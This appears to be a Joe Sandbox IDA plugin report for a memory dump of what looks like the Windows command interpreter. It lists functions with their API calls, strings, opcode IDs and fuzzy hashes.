Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1383533039-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 90d1e04a35e4057f80fc3b216912aee3cc4cf353f064d83cd56934e2c38f6f1e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6a2109193dd1b4d64624e13d60c0fd9b7cef4b6fc13ebc224e7fbc58e3dd1176
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90d1e04a35e4057f80fc3b216912aee3cc4cf353f064d83cd56934e2c38f6f1e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E41487090131C8BEF308F249C89BA97676AF48704F2820A9F10AF71D0DB764D92CF56
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2081463915-1668778490
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: bfd2bc5f3a9ba868c45cf4fd3dbcaaefaefc338d3ff9d22673677b6500929f87
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 69531947c4e8c2b781d09d01ed2e20cb3525d8cd4900b7bd18d49b1611bc0bac
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfd2bc5f3a9ba868c45cf4fd3dbcaaefaefc338d3ff9d22673677b6500929f87
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C21FC7120834E9BE7386F75AC1677A77DCDB803A4F24641EE242B51D2DEF4DC019A16
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F04A7B
                                                                                                                                                                                                                                                                                                                                                      • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00F04B98
                                                                                                                                                                                                                                                                                                                                                      • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00F04BC5
                                                                                                                                                                                                                                                                                                                                                      • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00F04BD2
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F04BDC
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F04C30
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s$/-.
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1033501010-531045382
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d4598e2f5a1e550d979ef582584d405ff15cc32a1afe13a0a261f07ace4a04d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: db471b61efe10e7b5034b54346347a417ca327dd1fc07b727a221f8672528696
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4598e2f5a1e550d979ef582584d405ff15cc32a1afe13a0a261f07ace4a04d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF8165B2F4020987DB24EE75CC46BFA73A5EFC4720F10416AE602E71D0EA75EE41B654
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                      • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: edc450c792db56c2252835322b5fde31aad8277a968276f51e997cd314e99440
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c91a8cd9719c89ca4504543949a6c8e2b2ffd5af6114e7b623ba4a68a22655a0
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edc450c792db56c2252835322b5fde31aad8277a968276f51e997cd314e99440
• Instruction Fuzzy Hash: F8316A316093DC9BC730AF569C49BBA37A8EF45758F086018FAC5B72A1DB748C41DB61
APIs
• LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00F06069
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 00F0607E
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 00F060DC
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00F06128
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 00F0614F
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00F06186
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
• API String ID: 1580871199-2613899276
• Opcode ID: 5f794216159f25659f4864520238b68007610d8058afd69ddecbdb262632051e
• Instruction ID: 2491b1cdcc18276376c3a21e55050b5ece3c75eb21cf23d737edcf2082e61d86
• Opcode Fuzzy Hash: 5f794216159f25659f4864520238b68007610d8058afd69ddecbdb262632051e
• Instruction Fuzzy Hash: 904153B1A0021DAFDB209B24CC85FBB767CEB41B54F0044A9AA05E3281DB709E55EF75
APIs
• _wcsicmp.MSVCRT ref: 00EF65A4
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00EF65D7
• _open_osfhandle.MSVCRT ref: 00EF65EB
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00F02092
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
• API String ID: 689241570-4257191772
• Opcode ID: 00721ff431fd4146f22f29e6a88103ae9fa425f73976d33823ac004351510e23
• Instruction ID: 1bf3f01bc4492c872727a7730ae67910be132229e74f0098b80de8fe05002fba
• Opcode Fuzzy Hash: 00721ff431fd4146f22f29e6a88103ae9fa425f73976d33823ac004351510e23
• Instruction Fuzzy Hash: DC313872A0021CAFD7349BA89C49BBF7BA9E741334F204229EA12F71C0DB709D01E761
APIs
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00F061D7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00F06211
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00F06254
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F0625B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00F0628D
• RtlFreeHeap.NTDLL ref: 00F06294
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00F0629B
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
• String ID: PE
• API String ID: 3093239467-4258593460
• Opcode ID: 62100a44cda0b7fd29606668e2998dd783072f62697011dc87d752615cda7255
• Instruction ID: 4a41f129f099ceae293e2c74ab2bb8328a96534c21b5ebd35ddb4c2c837ea00f
• Opcode Fuzzy Hash: 62100a44cda0b7fd29606668e2998dd783072f62697011dc87d752615cda7255
• Instruction Fuzzy Hash: 1D318F34A00318ABEF206BA58C19FAE7769ABC9B35F044114FD11D62C0DB749826FAB1
APIs
• memset.MSVCRT ref: 00EE8060
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 00EE81BE
  • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
  • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EE818C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE8197
• longjmp.MSVCRT(00F20A30,00000001,-00000001,00000000,?,00000000), ref: 00EFB09E
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EFB0AB
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EFB0C1
• fprintf.MSVCRT ref: 00EFB0D5
• fflush.MSVCRT ref: 00EFB0E3
  • Part of subcall function 00EE8F21: _wcsicmp.MSVCRT ref: 00EE8FCD
  • Part of subcall function 00EE8F21: _wcsicmp.MSVCRT ref: 00EE8FE3
  • Part of subcall function 00EE8F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EE9002
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE9013
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F28BF0,00000000,?), ref: 00EE8EC3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D3A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D44
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D57
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D61
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF01F5: wcsrchr.MSVCRT ref: 00EF01FB
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3753564779-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9aa277da98e1b24ecf0c54cfdcd4efda187569cfd180b779a8068b3d8b3dfbb8
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cbeac47a1630da2a1452d2640b9bd78ba0491359b70500064f7e512fc0053504
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9aa277da98e1b24ecf0c54cfdcd4efda187569cfd180b779a8068b3d8b3dfbb8
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1511030A0121DDBDB24ABB5ED56ABB77F0EF04314F142429EA0AF7291EF308981DB51
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F08B7B
                                                                                                                                                                                                                                                                                                                                                      • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F09323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F08B83
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F08BB5
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F08BBD
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F08BCF
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F08BD7
                                                                                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,?), ref: 00F08BED
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF654B: _wcsicmp.MSVCRT ref: 00EF65A4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00EF65D7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF654B: _open_osfhandle.MSVCRT ref: 00EF65EB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00F02092
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F08C1A
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F08C22
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4208585293-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 779c722b2d5318670e61c403ffdcb3a94b27bfbc749515d59bd2590d82221dcc
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8d0fb0f995349d235fb5d2c9513f690ee271968cc5303daf994148871146d28a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 779c722b2d5318670e61c403ffdcb3a94b27bfbc749515d59bd2590d82221dcc
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F21A671600109BFF728AF71DC4DF7A7AA9EF84360F24452CF591D61E1EE719C02A621
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s
• API String ID: 2221118986-3043279178
• Opcode ID: 6a3d7540f40ebdcbff5c15d5c47d310d6fa3ca74a4bbd3b5f1a22fa762cb26e2
• Instruction ID: 8030b03718c8edf1dab88e099ff26b2ebfe72235e2055a5266fd3dc69691951e
• Opcode Fuzzy Hash: 6a3d7540f40ebdcbff5c15d5c47d310d6fa3ca74a4bbd3b5f1a22fa762cb26e2
• Instruction Fuzzy Hash: 6091B47160838A9BD734DF61C885BBBB3E4BF94308F00592DE6C9A7191EB74DA04CB52
APIs
  • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
  • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
• _wcsnicmp.MSVCRT ref: 00EEC1B7
• wcstol.MSVCRT ref: 00EEC1FC
• wcstol.MSVCRT ref: 00EEC28A
• longjmp.MSVCRT(?,000000FF), ref: 00EFCFB0
• longjmp.MSVCRT(?,000000FF), ref: 00EFCFC4
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
• String ID:
• API String ID: 2863075230-0
• Opcode ID: 5ee6b2209cc7edd91b02e0bf5454d58c14d779a109fa3dcc5d7a38d62bb506e2
• Instruction ID: 927bcf3b1427b68a02f829c703d0f822b37784753a7f0743cfaf18fb2667160a
• Opcode Fuzzy Hash: 5ee6b2209cc7edd91b02e0bf5454d58c14d779a109fa3dcc5d7a38d62bb506e2
• Instruction Fuzzy Hash: 5CF19E76D0025D8BCB28DF99C8906FEB7B1AF88704F39925AD916B7390E7715D02CB90
APIs
• memset.MSVCRT ref: 00EF2795
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• memset.MSVCRT ref: 00EF280E
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 00EF281D
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 00EF2857
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 00EF290B
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: memset$EnvironmentVariable
• String ID: DIRCMD
• API String ID: 1405722092-1465291664
• Opcode ID: 9c5c061763b28995273304d469754fbe6202df469ac80f8d9428173626cf9b51
• Instruction ID: 82bea4a09852ecec0a38824ce8bda3f632c73423be76fbeaf51911e4f643c7b9
• Opcode Fuzzy Hash: 9c5c061763b28995273304d469754fbe6202df469ac80f8d9428173626cf9b51
• Instruction Fuzzy Hash: 627138B1A0D3859BD368DF29C884AABBBE4BFD4344F10592EF699D3250DB308904CB57
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
